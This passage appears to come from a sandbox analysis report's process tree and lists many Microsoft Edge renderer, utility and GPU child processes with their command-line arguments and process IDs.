        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
        5⤵
        
        PID:3016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
        5⤵
        
        PID:3088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
        5⤵
        
        PID:1772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
        5⤵
        
        PID:2648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
        5⤵
        
        PID:4040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
        5⤵
        
        PID:3452
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
        5⤵
        
        PID:4572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6704 /prefetch:8
        5⤵
        
        PID:3804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
        5⤵
        
        PID:5144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
        5⤵
        
        PID:5648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
        5⤵
        
        PID:1560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
        5⤵
        
        PID:3008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
        5⤵
        
        PID:4976
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1
        5⤵
        
        PID:4228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        
        PID:4404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1
        5⤵
        
        PID:4344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
        5⤵
        
        PID:2436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1324 /prefetch:1
        5⤵
        
        PID:2956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
        5⤵
        
        PID:4404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:1
        5⤵
        
        PID:5248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8376 /prefetch:1
        5⤵
        
        PID:1020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
        5⤵
        
        PID:1516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
        5⤵
        
        PID:2744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
        5⤵
        
        PID:5520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8924 /prefetch:1
        5⤵
        
        PID:3516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8948 /prefetch:1
        5⤵
        
        PID:1696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9236 /prefetch:1
        5⤵
        
        PID:5300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9244 /prefetch:1
        5⤵
        
        PID:680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9376 /prefetch:1
        5⤵
        
        PID:5684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9728 /prefetch:1
        5⤵
        
        PID:6520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9740 /prefetch:1
        5⤵
        
        PID:6528
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1
        5⤵
        
        PID:6932
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10180 /prefetch:1
        5⤵
        
        PID:6940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10544 /prefetch:1
        5⤵
        
        PID:6948
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10668 /prefetch:1
        5⤵
        
        PID:6956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10788 /prefetch:1
        5⤵
        
        PID:6964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10916 /prefetch:1
        5⤵
        
        PID:6972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11052 /prefetch:1
        5⤵
        
        PID:7160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10568 /prefetch:1
        5⤵
        
        PID:7752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2772 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6196
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=244 /prefetch:8
        5⤵
        
        PID:6252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
        5⤵
        
        PID:7364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
        5⤵
        
        PID:7388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1
        5⤵
        
        PID:8084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
        5⤵
        
        PID:7964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
        5⤵
        
        PID:4380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
        5⤵
        
        PID:7740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11988 /prefetch:1
        5⤵
        
        PID:2760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
        5⤵
        
        PID:5284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
        5⤵
        
        PID:8068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
        5⤵
        
        PID:4840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10072 /prefetch:1
        5⤵
        
        PID:4420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11204 /prefetch:1
        5⤵
        
        PID:5252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6072 /prefetch:8
        5⤵
        
        PID:5584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1364 /prefetch:8
        5⤵
        
        PID:5392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
        5⤵
        
        PID:4128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
        5⤵
        
        PID:7840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9844 /prefetch:1
        5⤵
        
        PID:2104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12256 /prefetch:1
        5⤵
        
        PID:2408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10596 /prefetch:1
        5⤵
        
        PID:7500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1
        5⤵
        
        PID:3480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1752 /prefetch:1
        5⤵
        
        PID:7064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
        5⤵
        
        PID:4244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13229035358354947678,205651230986841277,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4948 /prefetch:8
        5⤵
        
        PID:536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
